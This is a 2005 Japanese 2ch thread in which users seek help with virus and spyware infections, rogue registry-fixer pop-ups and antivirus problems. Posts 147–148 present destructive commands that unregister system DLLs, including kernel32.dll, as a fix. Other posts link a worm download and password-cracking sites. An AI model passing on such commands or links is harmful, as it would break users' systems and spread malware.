Wクリックしたところ、メディアプレイヤー起動後、ビジー状態になりました。
少し待ってもメディアプレイヤーがビジー状態のままだったので、タスクマネージャで強制終了し、
PCを再起動しました。

ところが、PC起動後、WinnyのDL用にしていたHDDがフォーマットされてしまい、読み取り
不可になってしまいました。
その後PCの調子もわるくなり、NETにつながり辛い状態が続いています。
「接続の修復」をすると一時つがるようにはなるのですが、数分するとすぐにつながり辛い状態に
なってしまいます。

NOD32をインストールしてスキャンもしましたが、ダメです。

これって何のウィルスなんでしょうか。どなたか教えて下さい。m(__)m
6859:2005/10/26(水) 03:25:04
すいません、>>59のExeplorar.exeは単に俺がスペル間違えただけっす。
6967:2005/10/26(水) 03:33:42
補足です。タスクバーやIEのツールバーのアイコンの下に変な影のような物が
現れます。(主にIEでネットに接続しようとする時です)

よろしくお願いします。
70名無しさん@お腹いっぱい。:2005/10/26(水) 04:06:02
>>67
リカバリ
71名無しさん@お腹いっぱい。:2005/10/26(水) 09:55:10
ワームI-Worm.Hybris.cがダウンロード可能。
ttp://saitorun.ddo.jp
コンピュータ>ソフト>コンピュータウィルス

あくまでテスト用に使ってください。
7267:2005/10/26(水) 10:28:47
すみません。質問テンプレをアゲます。

【使用OS】 XP SP2
【WindowsUpdateしてるか】
感染時=△。

【AntiVirusは何を使っているか】
感染時:avast、現在:NOD32

【ちゃんとUpdateしてるか】
してる。

【スキャンした結果(ウイルス名・発見場所)】
Winny2用のDLフォルダ内にキンタマ系ウィルスが5個くらいあった。
PC-CleanでスキャンしたらスパイウェアがウジャウジャHITしたので、全部削除した。

【別のオンラインスキャンしたならその結果は】
していない。
7367:2005/10/26(水) 10:30:56
【症状を具体的に、分かる限りすべて書く】
>>67>>69のとおりです。

【何をしたらそんなことになったのか】
>>67>>69のとおりです。

【これまでにとった措置】
ググって「Bobax」ではないかと思い、感染したと思われる「csrss.exe
services.exe
smss.exe」を
セットアップディスクから手動で置換。
→一時、症状が良くなったが、翌日には、また元に戻ってしまった。

70もちろん最終手段はそれしかありませんが…。
74名無しさん@お腹いっぱい。:2005/10/26(水) 10:48:58
>>67
さっさとリカバリー 誰もレスなんてしませんよ
75名無しさん@お腹いっぱい。:2005/10/26(水) 12:12:18
>>74の優しさに萌えた(*´Д`)ハァハァ
76名無しさん@お腹いっぱい。:2005/10/26(水) 12:37:23
Winny関連の話題は板違い。→ 【 Download板http://tmp5.2ch.net/download/ 】へ
77名無しさん@お腹いっぱい。:2005/10/26(水) 12:47:19
zipファイルをDLして解凍したらrarが出てきてそれをさらに解凍してしまいました。
どうやらウイルスらしいんですが解決するにはどうすればよいのでしょうか?
78名無しさん@お腹いっぱい。:2005/10/26(水) 13:05:36
79名無しさん@お腹いっぱい。:2005/10/26(水) 23:18:11
>>66
トン
80名無しさん@お腹いっぱい。:2005/10/26(水) 23:49:42
ニートの害虫駆除システムはこんな不安に100%おこたえします!
http://www.neat.ne.jp/system.html
81名無しさん@お腹いっぱい。:2005/10/27(木) 00:50:29
http://tool-3.net/?onimusha

http://tool-5.net/?ID

簡易パスクラのみでいきがる荒らし。 UGなど眼中にないらしい。 そんな痛い椰子らの目を覚まさしてやってくれ。
82名無しさん@お腹いっぱい。:2005/10/27(木) 01:03:56
xpでPokey駆除どうやるんだ(つд・)
83名無しさん@お腹いっぱい。:2005/10/27(木) 04:59:21
【使用OS】  XP
【WindowsUpdateしてるか】  してない
【AntiVirusは何を使っているか】 ウィルスバスター2005
【ちゃんとUpdateしてるか】 昨日した
【スキャンした結果(ウイルス名・発見場所)】
・TROJ DELF.OP 
・TORJ CLICKER.CK 

【症状を具体的に、分かる限りすべて書く】  不明
【何をしたらそんなことになったのか】 なにかふんだらしい

頻繁にウィルスバスターが反応します。で、隔離できるものとできないものがあります。

84名無しさん@お腹いっぱい。:2005/10/27(木) 06:47:25
>>83
>【WindowsUpdateしてるか】  してない

   論外!!  はい 次
85名無しさん@お腹いっぱい。:2005/10/27(木) 06:52:42
>>83
感染したって別にいいじゃん リカバリー
86名無しさん@お腹いっぱい。:2005/10/27(木) 07:01:28
>>83
そうやって「感染」「駆除」を何度も繰り返して滅茶苦茶なシステムを構築してください。
今にまともに動かなくなるし、穴を空けられてリモート操作されるかもしれない。
ファイアーウォールがまともに動いているうちはいいんだけどね。
87名無しさん@お腹いっぱい。:2005/10/27(木) 15:42:20
ウイルスバスターオンラインスキャン、なんか変更あったみたいですよ。
新しい使用許諾が必要になったような・・・
88名無しさん@お腹いっぱい。:2005/10/27(木) 18:48:55
ネットを見ていると、
突然あやしいエラーメッセージが出て
(レジストリが壊れているとかなんとか、、、)
ここ(下記)を見ろと書いてあり
tp://www.winfix32.com/
見れば「Doctor Cleaner」と言うソフトのサイトじゃないですか。
「scan now」なんていうボタンがあったりして、ますます怪しい。
これは一体なんなんでしょうか?
ウィルスの一種なんでしょうか?
89名無しさん@お腹いっぱい。:2005/10/27(木) 19:09:52
シマンテックのセキュリティーチェックをしようとすると、
(IE6.0使用。ActiveX とスクリプト処理は有効)


「ウイルス検出」の実行ができません

「ウイルス検出」を実行するには、Microsoft Internet Exploer 5.0 以上を使用し、
ActiveX とスクリプト処理を有効に設定する必要があります


と出ます。なぜですか?
90名無しさん@お腹いっぱい。:2005/10/27(木) 20:15:03
>>88
それは間違いなくスパイウェアだろ。
91名無しさん@お腹いっぱい。:2005/10/27(木) 21:13:28
ウィルスに感染してファイルが書き替えられた場合、
そのファイルのタイムスタンプも変更されていますか?
もしくはタイムスタンプは変更せずに中身だけ書き替えるなんて芸当もできますか?
92名無しさん@お腹いっぱい。:2005/10/27(木) 21:16:49
>>91
タイムスタンプは元々自由に書き換え可能な情報
93名無しさん@お腹いっぱい。:2005/10/27(木) 21:33:56
すいません・・・ City of herosとか言うメッセージが出て
Cドライブが変なアイコンになってしまいました
どうすれば良いのでしょうか・・・ 
教えて下さい 宜しく御願いします
94名無しさん@お腹いっぱい。:2005/10/27(木) 22:18:40
>>93
マルチは氏ね

という事
95名無しさん@お腹いっぱい。:2005/10/27(木) 22:25:22
スパイウェアはどうやって削除するんですか?
96名無しさん@お腹いっぱい。:2005/10/27(木) 22:27:35
>>95
リカバリー
97名無しさん@お腹いっぱい。:2005/10/27(木) 22:29:20
それ以外は方法ないんですか?
98名無しさん@お腹いっぱい。:2005/10/27(木) 22:55:46
>>97
少しは自分で調べようともせんのか?

さっさとリカバリーしてしまえ
99名無しさん@お腹いっぱい。:2005/10/27(木) 23:31:35
おまえら、ハッキリ言ってキモイ

でもちょっとだけ気持ち悪い
100名無しさん@お腹いっぱい。:2005/10/27(木) 23:55:59
           ,:゙::::::::::::::::::|   ,. -──- .ハ::::::: . ヽ
         /:::::::::::::|:::::::|,、イ´::::l::|::::::::::ヽ:ヽ::ヽ: . : . `,  〉
         /::::::::::::::|:::::::|::::::|:::'!::::lハレ::::::、|::::|:::::|::::`,:::::|  {
        ,!:::::::::::::::|: . ::ト、:::lヽ;:ゝ|´ヽ::::::/|'ト|、:|::::|::l:::リ  ;l
        |:::::::::::::: |::::::::|ゝi,'、r:テ、   ソ ケマ;、:|::::|ノソノ
         |::::::::::::::::|::::::::| イ:;;:::::''!      {:;;'{ h〔´
        .|:::::::|::::::::|::::::::| ヽ:-‐''      , `,,| ゝ}  ヽ   
        |::::::::|::::::::|::::::::| //〃            }' |  {    アアァ モット…
        .| :::::::|::::::::|:::::::::|       こ.ア  ,.イ /   〉
       |:::::::::|::::::: |::::::::::|ヽ、       イ  ∧   ゙
101名無しさん@お腹いっぱい。:2005/10/28(金) 08:38:03
>>53
こんな適当にレジストリいじって大丈夫だと思ってんのか?
102名無しさん@お腹いっぱい。:2005/10/28(金) 13:28:24
age
103名無しさん@お腹いっぱい。:2005/10/28(金) 14:28:48
hage
104名無しさん@お腹いっぱい。:2005/10/28(金) 15:06:29
>>101
三日も経ってから言う程の事でも無いと思われ
10547:2005/10/28(金) 19:57:14
>>52さんの教えてくれたとおりにFDD買ってきて、早速試したんですが、6枚目入れた後に
http://syobon.com/mini/src/mini9392.jpg
とブルースクリーンが出てその後どうにもできません。
いったいどうすればいいでしょうか?
106名無しさん@お腹いっぱい。:2005/10/28(金) 21:39:26
>>105
Lavieなら、起動時にF10連打でリカバリメニュー選択画面になる?
なれば、リカバリ。
でも、HDD壊れてたら、終わり。
HDD買い換えて、NECに電話して理科張りCD買え。
107名無しさん@お腹いっぱい。:2005/10/28(金) 21:47:11
先ほどネットをウロウロしていたら、突然PCの動きがおかしくなりました。
IEにAZZSERCHとかの複数のツールバーを勝手にインストールされ、
いろいろと書き換えられてしまったようです。

症状としては、再起動しても、起動して起動音が鳴った後に
壁紙のみが表示されて後は何も表示されません。
アイコンもツールバーもです。マウスクリックも効きません。
スタートメニューすら存在していないのです。

唯一、Ctrl+alt+delが機能したので、そこから「新しいタスク」
でspyBotを直接起動し、スパイウエアを駆除しましたが、
再起動後に壁紙しか表示されない状態が修正されません。
プロセスを見ると、スタートアップソフトなどはちゃんと起動しているみたいです。

どうもexplorer.exeが起動しないようです。新しいタスクから
explorerを指定しても起動しません。

あと、再起動後に壁紙が表示された後、一瞬だけDOSの画面が立ち上がり
すぐに消えます。

何かこの症状の改善策をご存じの方、または心当たりがある方、
ご指導よろしくお願いします。

OSはXP Proで、ウイルスソフトはノートンです。
108107:2005/10/28(金) 21:50:27
追記ですが、セーフモードでも症状が同じで、
前回正常起動時に戻るも試しましたがダメでした・・・
109名無しさん@お腹いっぱい。:2005/10/28(金) 21:50:43
ウィルス対策ソフトを常駐させていても定期的にスキャンする必要はあるのでしょうか?
ソフトは avast! のフリー版です。
110名無しさん@お腹いっぱい。:2005/10/28(金) 23:28:24
ネットに接続していると
パソコンにエラーがあるので
http://www.regfix.com/
に接続するようにとのメッセージが出て
そこをHPで見てみると
http://www.registryupdate.com/
というサイトに行くんですが、

どうしたらよいでしょうか?
111名無しさん@お腹いっぱい。:2005/10/28(金) 23:39:03
ノートンについて質問。インストールは無事に済みましたが
アクティブ化を要求されるので、サーバーに接続しようとしたが
無効なSKUとかメッセージが出てアクティブ化が失敗する。
電話でアクティブ化ってのも電話がつながらず。
HPに書いてあることはすべて試しました
SymKBFixってのもDLしてインストールしてみたしが結果は変わらず。
なにやら監査モードとやらになってるようなので、
HPに書いてある指示に従って対処してみたが、指定のファイルが
もともと存在してなかったので状況は変わらず。

シマンテックに質問したが、HPのリンク貼っただけのメールよこしただけで、
具体的な解決方法は書いてないというやる気の無さ。
(もう来年からノートンは使わん)

日にちも無いので、サーバーに接続する方法をお願いします。
112名無しさん@お腹いっぱい。:2005/10/28(金) 23:41:39
ttp://hasikehasike.fc2web.com/index1.html
これ何かな?
教えて下さい
113名無しさん@お腹いっぱい。:2005/10/29(土) 00:26:17
>>109
avastの常駐保護機能は悪魔でメモリ上のウィルスを探す機能、
ファイル側の検知は出来ないから、定期的にやるとよい。

頻繁にするのは逆にHDDの寿命を縮めるかもしれん。
114名無しさん@お腹いっぱい。:2005/10/29(土) 00:35:06
>>113
悪魔か。。。
115名無しさん@お腹いっぱい。:2005/10/29(土) 00:39:34
>>113
ウィルスはメモリを通らずに進入することもあるということですか?
例えばどんな場合がありますかね?
116名無しさん@お腹いっぱい。:2005/10/29(土) 00:43:39
>>115
例えば今お前のPCの前に座ってる奴とか
117名無しさん@お腹いっぱい。:2005/10/29(土) 01:12:53
>>116
誰もいないよ。
118名無しさん@お腹いっぱい。:2005/10/29(土) 03:57:26
WinXP用のアンチウイルスソフトを購入しようかと思っているのですが
デーモン等で常駐しないタイプで、マウスの右クリックから呼び出せるアンチウイルスソフトはありますか

URLだけでも教えてくださいまし、ちなみにノートンは買ったけど、うざい機能満載でイマイチでした
ネタじゃないので、マジレスお願いします!
119名無しさん@お腹いっぱい。:2005/10/29(土) 04:29:41
>>118
ノートン買ったのなら要らない機能全部外して右クリックメニューからだけ
使うようにすれば良いじゃない。
120 ◆N9P3SuvBPo :2005/10/29(土) 14:55:41
>107
まだ生きてるか。
WindowsXPですよね。
セーフモードでも、前回正常起動時の構成でも起動できないんだよね。

じゃあ、セーフモードとコマンドプロンプトは試した?
試してなければ、セーフモードとコマンドプロンプトで起動してみて。
それで起動できたら、システムの復元。
セーフモードとコマンドプロンプトで起動すると、exolorer.exeの変わりに
cmd.exeが立ち上がり、以下の表示が出ると思う。
c:\>
この表示が出たら、%systemroot%\system32\restore\rstrui.exe
と入力してEnterを押す。
それと、
>一瞬だけDOSの画面
どんなの?
121名無しさん@お腹いっぱい。:2005/10/30(日) 00:12:22
パソコンのスピーカーからたまに「パシャ パシャ」という音がします。
一度なるとそれが定期的に繰り返され、しばらくすると消えます。
これってウイルスですか?
122名無しさん@お腹いっぱい。:2005/10/30(日) 00:42:41
>>119
それが、最近の Norton は常駐しないと出来ないんですよ、更新も失敗するし・・・
123名無しさん@お腹いっぱい。:2005/10/30(日) 15:20:09
>>121ウイルスチェックして何も出なけりゃ電波とか
携帯近くに置いてない?
124名無しさん@お腹いっぱい。:2005/10/30(日) 21:14:45
>>121
IEのwebページ開く時の音な希ガス
125名無しさん@お腹いっぱい。:2005/10/30(日) 23:37:02
>>124
ポップアップ広告ブロッカーを入れてるならそれが作動してる音か
スパイウェアが動いてるとかってことないすか?
126107:2005/10/30(日) 23:45:35
>120
 ありがとうございます。
コマンドプロンプトから
システムの復元試しましたが、1日前までしか保存されておらず、
丁度日を又いでいたため、ダメでした・・・

で、ただ今復旧しました。
spybotの他にインストールしてあった
AD-awareをまたまたパス直接指定で起動して検索したら、
spybotでは検出できなかったヤツが引っかかり、
削除したら通常起動できました!!

セキュリティには気をつけてたはずなのに最近一番焦った出来事でした・・・
127名無しさん@お腹いっぱい。:2005/10/31(月) 06:46:44
【使用OS】
XPSP1
【WindowsUpdateしてるか】
しています
【AntiVirusは何を使っているか】
ノートンアンチウイルス
【ちゃんとUpdateしてるか】
最新のにしています
【スキャンした結果(ウイルス名・発見場所)】
感染していませんと出る
【別のオンラインスキャンしたならその結果は】
感染1
WORM_AGOBOT.AWR
場所は
\c\windows\system32の jswTss.exe
【症状を具体的に、分かる限りすべて書く】
昨日感染を発見してから、何回か勝手にシャットダウンの症状がでたり、
ブラウザのページが表示されなくなったりしています。
AGOBOTは色々対処法がでているのですが、拡張子が.AWRの亜種の駆除法が
ないので駆除できずにいます。
【何をしたらそんなことになったのか】
ファイルを送信するために一度FWを切って、数時間そのままでネットをしていたのが
原因じゃないかと思っています。mx,nyは使用していません。
【これまでにとった措置】
システム復元オフ、セーフモード状態で、レジストリからjswTss.exeを
削除しているのですが、再起動すると復活してしまいます。
AGOBOT駆除ツールを使っても.AWRという拡張子はサポートされていない
みたいで、駆除できませんでした。

どこか対策が出来るページを知っている方、または直し方がわかる方
いましたら、教えていただけないでしょうか。
128名無しさん@お腹いっぱい。:2005/10/31(月) 07:05:43
88です。
110の方も全くそっくりな怪しいサイトに誘導されるようですね。
(危険なので、ココでは最初のhtは省略した方が良いと思います。)
名前もwinfixとregfix。似ている。同一犯かな?
私は馬鹿なので、素直にscanしそうになってしまいました。
アブナイ、アブナイ。
90の方によれば「スパイウェア」らしいとの事ですが、、、
さらに情報を望む!
129名無しさん@お腹いっぱい。:2005/10/31(月) 08:54:05
>>127
>【使用OS】
>XPSP1
>【WindowsUpdateしてるか】
>しています
何か矛盾を感じないか?
130名無しさん@お腹いっぱい。:2005/10/31(月) 09:58:09
>>127
おまえのようなのは何にでも感染していて結構
救いの手は差し伸べられませんよ

一つ言える事、既に何かに感染していて、ファイアーウォールを無効にした事により、
ネットワークワームに感染した
さっさとリカバリーしやがれ
131名無しさん@お腹いっぱい。:2005/11/01(火) 01:21:54
開いただけでウイルスに感染するページ
http://pc8.2ch.net/test/read.cgi/sec/994847789/
から誘導されました・・よろしくお願いします。
OSはXP SP2、WinUpdateで最新状態でした。

↓危険です。以前、どっかのスレに貼られてた
p://www.xybererotica.com/

を間違えて踏んでしまい(Janeで閲覧中)、何かに感染しますた・・普段は
タブブラウザ使用でActive X、Java、JavaScriptなど全部切っているのですが、
標準のブラウザに設定していなかった為、踏んだらIEが起動して・・。
その時インターネットオプションの設定はJava、JavaScriptがオンになっていたので
感染しました・・orz 確か開いた時にSun Javaが勝手に起動したような気がします。

AVGでスキャンして2、3個引っかかったので名前もろくに見ないで削除して
しまって現在に至るのですが、どういうウィルスに感染したのでしょうか・・
AVGで削除したので大丈夫なんでしょうか?心配です・・長文すみません。

132名無しさん@お腹いっぱい。:2005/11/01(火) 01:30:20
>>131
それなら、Sun Javaの脆弱性を利用されたんだろうよ。
いつのバージョンのを使っているのやら?
今の所、最新にしてあればWindowsにプレビューだけで何かをインストールするようなサイトは発見していない。
133名無しさん@お腹いっぱい。:2005/11/01(火) 01:37:45
>>130
/ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄\
| なわけねぇだろ! |
\____ ___/
     ∨
 / ̄ ̄ ̄ ̄ ̄ ̄ミ
./   , ̄ ̄ ̄ ̄ミ
/  / /  \ |
| /  ,(・) (・) |
(6     つ  |
.|    ___ |
.|   /___/ / 田中のAA
/|      /\
134名無しさん@お腹いっぱい。:2005/11/01(火) 01:38:45
>>131
悪いがそのトップページには何にも仕込まれていない。
135131:2005/11/01(火) 02:26:50
>>131
>>134
レスありがとうございます。Sun Javaは最新では無かったようですorz
自分も今アクセスしてみたのですが・・ページが変わってしまっています!
踏んだ時はエロサイトに飛ばされたのに・・

あと、ウィルス名をメモっておいたようです。すみません(´Д`)
TROJAN_ANICMOO.A
JAVA/Bytever.S /A
TROJAN dropper.small
JAVA/Bytever.K .A-1

でした。AVGで削除できる種類のものですか?かなり凶悪なウィルスでしょうか?
136名無しさん@お腹いっぱい。:2005/11/01(火) 13:11:53
外付けHDDとかにウイルスが観戦した場合はフォーマットすればいいんですか?
感染したウイルスはwin32/pariteです。
137名無しさん@お腹いっぱい。:2005/11/01(火) 13:21:17
マイクロソフトのHP
http://www.microsoft.com/japan/にアクセスできないんだけど、オレだけですか?
落ちてるって可能性はないよね?
138名無しさん@お腹いっぱい。:2005/11/01(火) 13:43:30
>>137
いや、落ちてないよ。

ウィルスやワームに感染すると、マイクロソフトや主なアンチウィルスメーカーのサイトに
アクセスできなくなることあるけどな。
その場合、オンラインスキャンも利用できなくなる。
139名無しさん@お腹いっぱい。:2005/11/01(火) 20:47:42
知人がny使用中にフリーズしたので強制終了したところ
電源を入れると電源が点く→消える→点く→消えるを延々繰り返すように
なったらしいのですがこれってウイルス?
140名無しさん@お腹いっぱい。:2005/11/01(火) 21:01:06
>>139
知人じゃなくてオマエだろ?
141名無しさん@お腹いっぱい。:2005/11/01(火) 21:04:19
いや知人だってば
知人と言うか兄だけど
パソコン立ち上がらなくなったらしいんで
私が書き込んでいるんです

ウイルスでしょうか?
142名無しさん@お腹いっぱい。:2005/11/01(火) 21:12:55
143名無しさん@お腹いっぱい。:2005/11/01(火) 21:13:11
>>139 F8を連打しつつ『起てー起つんだー』と叫びながら起動
144名無しさん@お腹いっぱい。:2005/11/01(火) 21:17:57
141です、ごめんなさい


【使用OS】 winXP
【WindowsUpdateしてるか】 してない
【AntiVirusは何を使っているか】 ウイルスバスター2005
【ちゃんとUpdateしてるか】 してる
【スキャンした結果】
パソコンが起動しないのでスキャン出来ない

【別のオンラインスキャンしたならその結果は】 同上
【症状を具体的に、分かる限りすべて書く】 >>139
【何をしたらそんなことになったのか】 >>139

【これまでにとった措置】
故障と思いメーカーに問い合わせた所ウイルスではと返された
145名無しさん@お腹いっぱい。:2005/11/01(火) 21:27:48
Download板に行けって意味だったんだが・・・
146名無しさん@お腹いっぱい。:2005/11/01(火) 21:32:05
あ、ごめんなさい
そっちに行ってみます
すみませんでした
147名無しさん@お腹いっぱい。:2005/11/01(火) 21:32:51
>>144
これ、マジ危険な状態
OSをセーフモードで起動(電源入れたらF8キー連打)
セーフモードで起動
スタートを開いてファイルを指名して実行
regsvr32 /u *.dll
OK押して再起動
これで治るぞ。
148名無しさん@お腹いっぱい。:2005/11/01(火) 21:35:58
>regsvr32 /u *.dll
こいつが駄目なら
regsvr32 /u kernel32.dll
PC初心者某スレのアドバイス
149名無しさん@お腹いっぱい。:2005/11/01(火) 22:00:04
>>147-148
ありがとうございます
試してみます
板違いでしたのに本当に感謝してます
ありがとうございました
150名無しさん@お腹いっぱい。:2005/11/01(火) 22:12:13
右下のタスクトレイに手紙二つ重ねた上に青の点が付いたようなアイコンが
出てるのですが、これはなんでしょうか?カーソルを当てると”221×248×90×8.ap221.ftth.ucom.ne.jp”とか
”YahooBB219055074076.bbtec.net”ってでるんですけど・・・
知ってる方居ましたら教えてください!
151名無しさん@お腹いっぱい。:2005/11/01(火) 22:14:56
>>150
ウイルスや!
>>147>>148
152名無しさん@お腹いっぱい。:2005/11/01(火) 22:15:35
>>150
アンチウィルスソフトにavast使ってる?
153名無しさん@お腹いっぱい。:2005/11/01(火) 22:16:49
>>152 アバスト使ってます!!何かあるのでしょうか?
154名無しさん@お腹いっぱい。:2005/11/01(火) 22:23:04
>>153
アウトルックかなんかのメールソフトのメールをスキャンしてるんだろ。
155名無しさん@お腹いっぱい。:2005/11/01(火) 22:29:47
OS:XP sp2
ブラウザー:プニル
メールソフト:サンダーバード
>>154 一応メールをチェックしたのですが、そのようなメールアドレスからメール受信した
記録がなかったのですが・・
一応、オンラインウイルスチェックはしましたが、ウィルスは発見されませんでした。
でも、やはりウイルスでしょうか?
156名無しさん@お腹いっぱい。:2005/11/01(火) 22:42:31
>>155
nyとかshare使ってない?
157名無しさん@お腹いっぱい。:2005/11/01(火) 22:44:15
>>156 shareやってます!何か関係あるのでしょうか?
158名無しさん@お腹いっぱい。:2005/11/01(火) 22:47:03
avastスレ行け。
ウィルスかどうか知りたければオンラインスキャンしろ
159名無しさん@お腹いっぱい。:2005/11/01(火) 22:48:09
どう見ても精子です
本当にありがとうございました。
160名無しさん@お腹いっぱい。:2005/11/01(火) 22:49:10
ポートが開いてるんだな。
161名無しさん@お腹いっぱい。:2005/11/01(火) 22:51:10
>>160 ポートが開いてるから、どういうことなのでしょうか?
    侵入されてるってことでしょうか?パソコンの中身を見られてるってことでしょうか?
162161:2005/11/01(火) 22:52:51
自己解決しました。
163161:2005/11/01(火) 23:11:04
すいません、もう他の板に逝ってきます!
では、レスしてくださった方ありがとうございました。

162さんへ 凸
164名無しさん@お腹いっぱい。:2005/11/02(水) 14:07:25
【使用OS】
 xp SP1
【WindowsUpdateしてるか】
 しています。
【AntiVirusは何を使っているか】
 バスター2006
【ちゃんとUpdateしてるか】
 しています。
【スキャンした結果(ウイルス名・発見場所)】
 発見されませんでした。
【別のオンラインスキャンしたならその結果は】
 していません。
【症状を具体的に、分かる限りすべて書く】
 症状は特に無いのですが、c:\windows\win.iniを開くと
 LoadDir=C:\Documents and Settings\ユーザー名\デスクトップ\
 という文字があります。これが気になっているんですが、
 なんなのかお教えいただけませんでしょうか?
【何をしたらそんなことになったのか】
 友人からゲーム(コピー)をもらってインストールしました。
【これまでにとった措置】
 バスター2006でウィルス検索をしました。
 結果は特に見つかりませんでした。

 よろしくお願いいたします。
165名無しさん@お腹いっぱい。:2005/11/02(水) 14:14:15
【使用OS】
 xp SP1
【WindowsUpdateしてるか】
 しています。
【AntiVirusは何を使っているか】
 バスター2006
【ちゃんとUpdateしてるか】
 しています。



??????????????
166名無しさん@お腹いっぱい。:2005/11/02(水) 15:50:35
>>164

  ∧_∧
 ( ´∀`)  / ̄ ̄ ̄ ̄ ̄
 (    ) < たぶん、古いゲームだから。
 | | |  \_____
 (__)___)

LoadDir=・・・・・・は、まんま。「読め!!」
167名無しさん@お腹いっぱい。:2005/11/02(水) 16:57:45
ttp://www.itmedia.co.jp/enterprise/articles/0511/02/news022.html
SONY BMGのコピー防止CDがrootkitを組み込む

このCDをWindowsマシンに挿入すると、ライセンス同意書が表示され、音楽プレーヤーが
インストールされると書かれているが、実はrootkitがインストールされることになる、
とF-Secureは指摘。直接このrootkitをアンインストールする方法はないとしている。
このシステムの実装では、ウイルスなどの悪質なソフトウェアがこのrootkitを
悪用して隠れることが可能だとF-Secureは述べている。
このため、最新のウイルス対抗ソフトを使っても探知できない可能性があるという。
168164:2005/11/02(水) 17:17:46
>>166
レスありがとうございます。

>LoadDir=・・・・・・は、まんま。「読め!!」
えっと、アドバイスいただいたのですが、よくわかりません。
気にしなくてもいいと思っても良いでしょうか?
169名無しさん@お腹いっぱい。:2005/11/02(水) 17:30:38
好きにしろよもう
170名無しさん@お腹いっぱい。:2005/11/02(水) 23:43:36
質問です。いきなり変なことになりました。誰か助けて下さい。初期化は絶対にやりません。
【使用OS】 XP
【WindowsUpdateしてるか】 感染したらどうすんの
【AntiVirusは何を使っているか】 Virus入れてどうすんの
【ちゃんとUpdateしてるか】 VirusのUpdateなんかやってどうすんの
【スキャンした結果(ウイルス名・発見場所)】 スキャンして起動しなくなったらどうすんの
【別のオンラインスキャンしたならその結果は】 オンラインスキャンなんかして、起動しなくなったらどうすんの
【症状を具体的に、分かる限りすべて書く】 わからん、いきなり変になった
【何をしたらそんなことになったのか】 いきなり変になった
【これまでにとった措置】 再起動
【その他の質問】 初期化は絶対にやりませんので、誰か治してください。
171名無しさん@お腹いっぱい。:2005/11/02(水) 23:51:21
170です。
誰もレス無いね(藁
もしかして治せないの?
頭悪いんだね君たちって(藁
人の迷惑とか、攻撃の踏み台とかって、俺には関係無いし(藁
ずっとネットに繋いでいたって起動できているから(木亥火暴藁
172名無しさん@お腹いっぱい。:2005/11/02(水) 23:54:35
>>170
>>171
随分頑張ったようだか何も面白くない。

とりあえず乙
173名無しさん@お腹いっぱい。:2005/11/03(木) 00:17:06
>>170-171
俺マジで君が何いいたいのかわからんわ!
ごめんね!





マジ、氏ね!うざいから!
174名無しさん@お腹いっぱい。:2005/11/03(木) 02:03:39
他の板から誘導されてこちらにきました。
先日、ノートンでトロイの木馬ウィルスを駆除した際、セーフモードにしてWindowsファイル(sysflg32.exe)に偽装したトロイウィルスを駆除しました。
しかしその後、Windowsを起動するたびに「そのファイルが存在しません」という警告が出るようになり、起動が非常に不安定になりました。
リカバリなしで元の状態に戻す術はありますか?
ソニーのバイオ、WindowsXPです。
175名無しさん@お腹いっぱい。:2005/11/03(木) 02:16:30
>>174
バイオはパスも通ってないのかよ ふ〜ん最低
176名無しさん@お腹いっぱい。:2005/11/03(木) 02:27:28
>>174
ファイル名しか書かねえからよ もう
システムファイルじゃねえな それ
レジストリ内にそのファイルを起動する記述が残ってるからだろうが もう バカ
177名無しさん@お腹いっぱい。:2005/11/03(木) 04:15:16
NOD32の体験版を入れていたのに、
Trojan-Dropper.Win32.Agent.jpというのに感染した。

あとで他の人にKaspersky、McAfee、Symantec、ClamAVが
とっくに対応済みだと指摘されて口惜しかったよ。('A`)
http://www.viruslist.com/en/viruses/encyclopedia?virusid=79420
178名無しさん@お腹いっぱい。:2005/11/03(木) 08:37:22
質問です。教えてください。
頻繁に私のアドレスにウィルスを送ってくるメールアドレスが
あります。私のメールアドレスとよく似たアドレスで、
*****@****.○○○.ne.jpが私のメールアドレスだとしたら、相手は
*****@****.×××.or.jpという感じで、×××.or以外は同じです。
×××はプロバイダの名前なのですが、プロバイダに
苦情を言ったら、その私とよく似たアドレスを持っている人に
警告をしてくれるでしょうか。
それとも放っておいたほうがいいですか?

ウィルスは圧縮(zip)されていて、memoとかreportとかいうタイトルが
付いていることが多いです。今回来たのはInfo_prices.zipというものです。
どんなウィルスなのかは、すみませんよくわかりません。
179名無しさん@お腹いっぱい。:2005/11/03(木) 08:51:47 BE:450508695-
>>178
メールアドレスは誰でもどんなメルアドにできる
例えばオレがあなたのメルアドをそのまま真似する事も可能
文句を言うならメールのソースを見てIPを調べてその
プロバに文句言って下さい
180名無しさん@お腹いっぱい。:2005/11/03(木) 09:05:47
>>178
その手のメアド=偽装と思って間違いないから警告しても無駄だよ
181名無しさん@お腹いっぱい。:2005/11/03(木) 09:06:21
>>179
ありがとうございます。
私はてっきり、私と同じようなアドレスの方がウィルスに感染しているのに、
気が付いていないでいるのかと思っていました。違うのですね。
プロバイダの人に連絡してみます。
182名無しさん@お腹いっぱい。:2005/11/03(木) 09:07:58
>>180
ありがとうございます。偽装だとプロバイダの人もわからないって
ことでしょうか。それじゃ、どうしょうもないかな。
183名無しさん@お腹いっぱい。:2005/11/03(木) 09:38:48
xpsp2で、ノートン、Ad−awareです。
恥ずかしながらノートンは更新期限切れで1年ほどそのままです。
最近、Adでスキャンすると頻繁に
「dyfuca」
が検出されます。
Adで頻繁に駆除してますが、ノートン更新したがいいんですかね?
エロサイトはたまーに程度なので、なんで「dyfuca」が侵入してる
のかがよくわかりません。なんででしょう?
184名無しさん@お腹いっぱい。:2005/11/03(木) 09:53:23
好きにしなさい
185名無しさん@お腹いっぱい。:2005/11/03(木) 09:59:43 BE:200226454-
>>183
アンチウイルスは最新のものを使うのが肝心なので
フリーのAvast!を使うほうがいいとおもう
Ad-awareで復活するならPc-Cleanを試してみてくれ
186名無しさん@お腹いっぱい。:2005/11/03(木) 10:12:52
>>185
Avast、Pc-Clean、いずれも調べてみましたが、よさげですね!
早速試してみます。
ありがとうございました。
187名無しさん@お腹いっぱい。:2005/11/03(木) 10:34:51
PC-Cleanか・・・・
188名無しさん@お腹いっぱい。:2005/11/03(木) 10:52:45
以前スパイウエアに感染してから、IEのホームページが必ず以下の
ページに設定されるようになってしまいました。
設定を変えても、PCを再起動すると必ずこのページがホームページ
に再設定されています。

↓アクセス注意。
ttp://www.findthewebsiteyouneed.com/

Ad-awareとSpybot、またノートンでは何も検出されません。
WinXpでIEは最新版です。
どなたか直し方をアドバイス下さい。
189名無しさん@お腹いっぱい。:2005/11/03(木) 11:02:28
>>188
直せない人はリカバリー
